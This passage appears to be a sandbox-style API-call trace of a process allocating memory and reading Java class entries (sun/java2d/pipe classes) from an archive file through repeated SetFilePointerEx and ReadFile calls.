lpOverlapped=0x0) returned 1 [0130.026] malloc (_Size=0x48) returned 0x12e60140 [0130.026] malloc (_Size=0xa0) returned 0x12dabf70 [0130.026] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34113ce, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596558) returned 1 [0130.026] ReadFile (in: hFile=0x134, lpBuffer=0x12dabf70, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dabf70*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.026] malloc (_Size=0x37) returned 0x12ef4cd0 [0130.027] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa555c, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49960284) returned 1 [0130.027] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.027] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa55b0, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49960368) returned 1 [0130.027] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9e0, nNumberOfBytesToRead=0x154, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9e0*, lpNumberOfBytesRead=0x208c6e0*=0x154, lpOverlapped=0x0) returned 1 [0130.028] malloc (_Size=0x48) returned 0x12e600f0 [0130.028] malloc (_Size=0xa0) returned 0x12dab940 [0130.028] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411375, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54596469) returned 1 [0130.028] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0130.028] malloc (_Size=0x2c) returned 0x12ed5bb0 [0130.028] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa4cf5, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=49958133) returned 1 [0130.028] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0130.029] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa4d3e, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=49958206) returned 1 [0130.029] ReadFile (in: hFile=0x134, lpBuffer=0x1227a5d0, nNumberOfBytesToRead=0x81e, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a5d0*, lpNumberOfBytesRead=0x208bca0*=0x81e, lpOverlapped=0x0) returned 1 [0130.031] malloc (_Size=0x48) returned 0x12e5f470 [0130.031] malloc (_Size=0xa0) returned 0x12dac9c0 [0130.031] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411311, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596369) returned 1 [0130.031] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.031] malloc (_Size=0x37) returned 0x12ef4cd0 [0130.032] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa4b19, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49957657) returned 1 [0130.032] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.032] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa4b6d, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49957741) returned 1 [0130.032] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9e0, nNumberOfBytesToRead=0x188, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9e0*, lpNumberOfBytesRead=0x208c6e0*=0x188, lpOverlapped=0x0) returned 1 [0130.032] malloc (_Size=0x48) returned 0x12e5ffb0 [0130.032] malloc (_Size=0xa0) returned 0x12dabe10 [0130.033] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34112b0, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54596272) returned 1 [0130.036] ReadFile (in: hFile=0x134, lpBuffer=0x12dabe10, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12dabe10*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0130.036] malloc (_Size=0x34) returned 0x12ed5bb0 [0130.038] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa37ae, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=49952686) returned 1 [0130.039] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0130.042] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa37ff, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=49952767) returned 1 [0130.042] ReadFile (in: hFile=0x134, lpBuffer=0x1227a5e0, nNumberOfBytesToRead=0x131a, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a5e0*, lpNumberOfBytesRead=0x208bca0*=0x131a, lpOverlapped=0x0) returned 1 [0130.044] malloc (_Size=0x48) returned 0x12e5f880 [0130.044] malloc (_Size=0xa0) returned 0x12dac860 [0130.044] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411260, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596192) returned 1 [0130.044] ReadFile (in: hFile=0x134, lpBuffer=0x12dac860, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dac860*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.044] malloc (_Size=0x23) returned 0x12dda980 [0130.045] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa300d, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49950733) returned 1 [0130.045] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.045] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa304d, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49950797) returned 1 [0130.045] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x761, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x761, lpOverlapped=0x0) returned 1 [0130.046] malloc (_Size=0x48) returned 0x12e5f380 [0130.046] malloc (_Size=0xa0) returned 0x12daaef0 [0130.046] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x341120c, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54596108) returned 1 [0130.047] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.047] malloc (_Size=0x27) returned 0x12ddb190 [0130.047] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa277a, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49948538) returned 1 [0130.048] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.049] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2fa27be, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49948606) returned 1 [0130.049] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x84f, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x84f, lpOverlapped=0x0) returned 1 [0130.053] malloc (_Size=0x48) returned 0x12e5ff60 [0130.054] malloc (_Size=0xa0) returned 0x12dabc00 [0130.054] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34111c2, lpNewFilePointer=0x208c4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4b0*=54596034) returned 1 [0130.054] ReadFile (in: hFile=0x134, lpBuffer=0x12dabc00, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c480, lpOverlapped=0x0 | out: lpBuffer=0x12dabc00*, lpNumberOfBytesRead=0x208c480*=0xa0, lpOverlapped=0x0) returned 1 [0130.054] malloc (_Size=0x1d) returned 0x12ddab00 [0130.054] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9f27d, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=49934973) returned 1 [0130.054] ReadFile (in: hFile=0x134, lpBuffer=0x208c100, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x208c100*, lpNumberOfBytesRead=0x208c080*=0x1e, lpOverlapped=0x0) returned 1 [0130.074] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9f2b7, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=49935031) returned 1 [0130.074] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x34c3, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c0e0*=0x34c3, lpOverlapped=0x0) returned 1 [0130.078] malloc (_Size=0x48) returned 0x12e600a0 [0130.078] malloc (_Size=0xa0) returned 0x12dac9c0 [0130.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411170, lpNewFilePointer=0x208c4b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c4b0*=54595952) returned 1 [0130.078] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c480, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208c480*=0xa0, lpOverlapped=0x0) returned 1 [0130.078] malloc (_Size=0x25) returned 0x12ddaef0 [0130.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9ee62, lpNewFilePointer=0x208c0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c0b0*=49933922) returned 1 [0130.078] ReadFile (in: hFile=0x134, lpBuffer=0x208c100, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c080, lpOverlapped=0x0 | out: lpBuffer=0x208c100*, lpNumberOfBytesRead=0x208c080*=0x1e, lpOverlapped=0x0) returned 1 [0130.079] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9eea4, lpNewFilePointer=0x208c110, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c110*=49933988) returned 1 [0130.079] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x3d9, lpNumberOfBytesRead=0x208c0e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c0e0*=0x3d9, lpOverlapped=0x0) returned 1 [0130.090] strlen (_Str="sun/java2d/pipe/Region$ImmutableRegion.class") returned 0x2c [0130.090] malloc (_Size=0x48) returned 0x12e5eed0 [0130.090] malloc (_Size=0xa0) returned 0x12dab940 [0130.090] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411116, lpNewFilePointer=0x208bd90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd90*=54595862) returned 1 [0130.090] ReadFile (in: hFile=0x134, lpBuffer=0x12dab940, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bd60, lpOverlapped=0x0 | out: lpBuffer=0x12dab940*, lpNumberOfBytesRead=0x208bd60*=0xa0, lpOverlapped=0x0) returned 1 [0130.090] malloc (_Size=0x2d) returned 0x12ed5bb0 [0130.091] strlen (_Str="sun/java2d/pipe/Region$ImmutableRegion.class") returned 0x2c [0130.091] strcpy (in: _Dest=0x208bf10, _Source="sun/java2d/pipe/Region$ImmutableRegion.class" | out: _Dest="sun/java2d/pipe/Region$ImmutableRegion.class") returned="sun/java2d/pipe/Region$ImmutableRegion.class" [0130.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9ec2c, lpNewFilePointer=0x208b990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b990*=49933356) returned 1 [0130.091] ReadFile (in: hFile=0x134, lpBuffer=0x208b9e0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b960, lpOverlapped=0x0 | out: lpBuffer=0x208b9e0*, lpNumberOfBytesRead=0x208b960*=0x1e, lpOverlapped=0x0) returned 1 [0130.091] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9ec76, lpNewFilePointer=0x208b9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9f0*=49933430) returned 1 [0130.091] ReadFile (in: hFile=0x134, lpBuffer=0x20fe9b0, nNumberOfBytesToRead=0x1ec, lpNumberOfBytesRead=0x208b9c0, lpOverlapped=0x0 | out: lpBuffer=0x20fe9b0*, lpNumberOfBytesRead=0x208b9c0*=0x1ec, lpOverlapped=0x0) returned 1 [0130.092] free (_Block=0x12ddaef0) [0130.092] free (_Block=0x12e600a0) [0130.107] strlen (_Str="sun/java2d/pipe/AAShapePipe.class") returned 0x21 [0130.109] malloc (_Size=0x48) returned 0x12e5fdd0 [0130.109] malloc (_Size=0xa0) returned 0x12dac390 [0130.109] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x34110c7, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595783) returned 1 [0130.109] ReadFile (in: hFile=0x134, lpBuffer=0x12dac390, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dac390*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.109] malloc (_Size=0x22) returned 0x12ddac80 [0130.110] strlen (_Str="sun/java2d/pipe/AAShapePipe.class") returned 0x21 [0130.110] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/AAShapePipe.class" | out: _Dest="sun/java2d/pipe/AAShapePipe.class") returned="sun/java2d/pipe/AAShapePipe.class" [0130.110] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9dce9, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49929449) returned 1 [0130.110] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.112] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9dd28, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49929512) returned 1 [0130.112] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0xf04, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0xf04, lpOverlapped=0x0) returned 1 [0130.161] free (_Block=0x12ed5bb0) [0130.162] free (_Block=0x12e5eed0) [0130.171] strlen (_Str="sun/java2d/pipe/AlphaPaintPipe.class") returned 0x24 [0130.172] malloc (_Size=0x48) returned 0x12e5efc0 [0130.172] malloc (_Size=0xa0) returned 0x12dab310 [0130.172] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411075, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595701) returned 1 [0130.172] ReadFile (in: hFile=0x134, lpBuffer=0x12dab310, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dab310*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.172] malloc (_Size=0x25) returned 0x12ddaa40 [0130.172] strlen (_Str="sun/java2d/pipe/AlphaPaintPipe.class") returned 0x24 [0130.172] strcpy (in: _Dest=0x208cc30, _Source="sun/java2d/pipe/AlphaPaintPipe.class" | out: _Dest="sun/java2d/pipe/AlphaPaintPipe.class") returned="sun/java2d/pipe/AlphaPaintPipe.class" [0130.173] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9cbf1, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49925105) returned 1 [0130.173] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.174] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9cc33, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49925171) returned 1 [0130.174] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x10b6, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x10b6, lpOverlapped=0x0) returned 1 [0130.174] free (_Block=0x12ddac80) [0130.175] free (_Block=0x12e5fdd0) [0130.181] malloc (_Size=0x48) returned 0x12e5f060 [0130.181] malloc (_Size=0xa0) returned 0x12dac9c0 [0130.181] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3411016, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595606) returned 1 [0130.181] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.182] malloc (_Size=0x32) returned 0x12ed5bb0 [0130.182] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9c8bb, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49924283) returned 1 [0130.183] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.183] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9c90a, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49924362) returned 1 [0130.183] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x2e7, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x2e7, lpOverlapped=0x0) returned 1 [0130.184] malloc (_Size=0x48) returned 0x12e5f600 [0130.184] malloc (_Size=0xa0) returned 0x12dac7b0 [0130.184] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410fc1, lpNewFilePointer=0x208c070, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c070*=54595521) returned 1 [0130.185] ReadFile (in: hFile=0x134, lpBuffer=0x12dac7b0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c040, lpOverlapped=0x0 | out: lpBuffer=0x12dac7b0*, lpNumberOfBytesRead=0x208c040*=0xa0, lpOverlapped=0x0) returned 1 [0130.185] malloc (_Size=0x28) returned 0x12ddab00 [0130.185] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9b984, lpNewFilePointer=0x208bc70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bc70*=49920388) returned 1 [0130.185] ReadFile (in: hFile=0x134, lpBuffer=0x208bcc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bc40, lpOverlapped=0x0 | out: lpBuffer=0x208bcc0*, lpNumberOfBytesRead=0x208bc40*=0x1e, lpOverlapped=0x0) returned 1 [0130.186] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9b9c9, lpNewFilePointer=0x208bcd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bcd0*=49920457) returned 1 [0130.186] ReadFile (in: hFile=0x134, lpBuffer=0x1227a920, nNumberOfBytesToRead=0xef2, lpNumberOfBytesRead=0x208bca0, lpOverlapped=0x0 | out: lpBuffer=0x1227a920*, lpNumberOfBytesRead=0x208bca0*=0xef2, lpOverlapped=0x0) returned 1 [0130.188] malloc (_Size=0x48) returned 0x12e5fc90 [0130.188] malloc (_Size=0xa0) returned 0x12dab890 [0130.188] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410f69, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595433) returned 1 [0130.188] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.188] malloc (_Size=0x2b) returned 0x12ed5bb0 [0130.188] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9a8da, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49916122) returned 1 [0130.188] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.189] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9a922, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49916194) returned 1 [0130.189] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x1062, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x1062, lpOverlapped=0x0) returned 1 [0130.190] malloc (_Size=0x48) returned 0x12e5fa60 [0130.190] malloc (_Size=0xa0) returned 0x12daaef0 [0130.190] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410f1c, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595356) returned 1 [0130.191] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.191] malloc (_Size=0x20) returned 0x12ddb190 [0130.191] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f972e1, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49902305) returned 1 [0130.191] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.192] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f9731e, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49902366) returned 1 [0130.192] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x35bc, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x35bc, lpOverlapped=0x0) returned 1 [0130.194] malloc (_Size=0x48) returned 0x12e5fdd0 [0130.194] malloc (_Size=0xa0) returned 0x12dab890 [0130.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410ecc, lpNewFilePointer=0x208cab0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cab0*=54595276) returned 1 [0130.195] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca80, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208ca80*=0xa0, lpOverlapped=0x0) returned 1 [0130.195] malloc (_Size=0x23) returned 0x12dda9e0 [0130.195] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f96df1, lpNewFilePointer=0x208c6b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6b0*=49901041) returned 1 [0130.195] ReadFile (in: hFile=0x134, lpBuffer=0x208c700, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c680, lpOverlapped=0x0 | out: lpBuffer=0x208c700*, lpNumberOfBytesRead=0x208c680*=0x1e, lpOverlapped=0x0) returned 1 [0130.196] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f96e31, lpNewFilePointer=0x208c710, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c710*=49901105) returned 1 [0130.196] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x208c6e0, lpOverlapped=0x0 | out: lpBuffer=0x1227a470*, lpNumberOfBytesRead=0x208c6e0*=0x4b0, lpOverlapped=0x0) returned 1 [0130.197] malloc (_Size=0x48) returned 0x12e5ff10 [0130.197] malloc (_Size=0xa0) returned 0x12daace0 [0130.197] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3410e76, lpNewFilePointer=0x208ca40, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ca40*=54595190) returned 1 [0130.197] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208ca10, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208ca10*=0xa0, lpOverlapped=0x0) returned 1 [0130.197] malloc (_Size=0x29) returned 0x12ed5bb0 [0130.197] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f96a28, lpNewFilePointer=0x208c640, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c640*=49900072) returned 1 [0130.197] ReadFile (in: hFile=0x134, lpBuffer=0x208c690, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c610, lpOverlapped=0x0 | out: lpBuffer=0x208c690*, lpNumberOfBytesRead=0x208c610*=0x1e, lpOverlapped=0x0) returned 1 [0130.197] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2f96a6e, lpNewFilePointer=0x208c6a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6a0*=49900142) returned 1 [0130.197] ReadFile (in: hFile=0x134, lpBuffer=0x1227a470, nNumberOfBytesToRead=0x383, lpNumberOfBytesRead=0x208c670, lpOverlapped=0x0 | out: 